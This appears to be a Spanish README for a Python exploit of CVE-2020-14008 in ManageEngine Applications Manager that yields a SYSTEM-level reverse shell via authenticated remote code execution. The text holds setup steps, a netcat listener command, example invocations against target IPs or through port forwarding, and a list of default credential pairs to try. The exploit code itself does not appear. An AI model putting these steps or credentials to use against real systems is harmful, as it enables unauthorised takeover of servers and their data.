
Exploit en Python para CVE-2020-14008 en ManageEngine Applications Manager que entrega una reverse shell a nivel SYSTEM a través de ejecución remota de código autenticada.
Este script explota la CVE-2020-14008 en ManageEngine Applications Manager para obtener una reverse shell con privilegios SYSTEM.
pip3 install requests urllib3
nc -nlvp 9001
python3 cve-2020-14008-exploit.py <target_url> <username> <password> <your_ip> <your_port>
# Direct attack
python3 cve-2020-14008-exploit.py https://192.168.1.100:8443 admin admin 192.168.1.50 9001
# Through port forwarding
python3 cve-2020-14008-exploit.py https://localhost:8443 admin admin 127.0.0.1 9001
admin:adminadministrator:administratorguest:guest